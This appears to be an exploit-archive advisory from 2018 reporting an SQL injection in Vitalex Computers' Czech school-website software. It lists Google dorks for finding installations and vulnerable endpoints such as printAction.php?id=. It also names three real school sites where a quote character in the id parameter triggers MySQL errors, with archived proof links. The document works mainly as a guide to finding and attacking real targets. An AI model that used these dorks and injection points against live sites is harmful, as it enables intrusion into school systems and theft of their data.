####################################################################################### # Exploit Title : Czech Copyright © 2011 - 2018 | Vitalex Computers s.r.o. - Tvorba školních webů SQL Injection Vulnerability # Author : KingSkrupellos from Cyberizm Digital Security Team # Date : 26/05/2018 # Vendor Homepages : vitalex.cz # Exploit Risk : Medium ####################################################################################### # Google Dork 1 : intext:'' Vitalex Computers - Tvorba školních webů'' site:cz # Google Dork 2 : inurl:''/index.php?type=Blog&id='' site:cz # Google Dork 3 : inurl:''/public/printAction.php?id='' Other Possible Dorks => inurl:''/public/printCalendar.php'' site:cz inurl:''/public/printFood.php'' site:cz inurl:''/public/script.php'' site:cz inurl:''/public/setTemplate.php'' site:cz inurl:''/public/statniSvatky.php'' site:cz ######################################################################################## # Example Sites => # zsodolenavoda.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/vTVbe Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 # skolahotelnictvi.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/gHcSO Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 # spss-mel.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] => archive.is/Phhwq Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 ####################################################################################### # Discovered By KingSkrupellos from Cyberizm Digital Security Team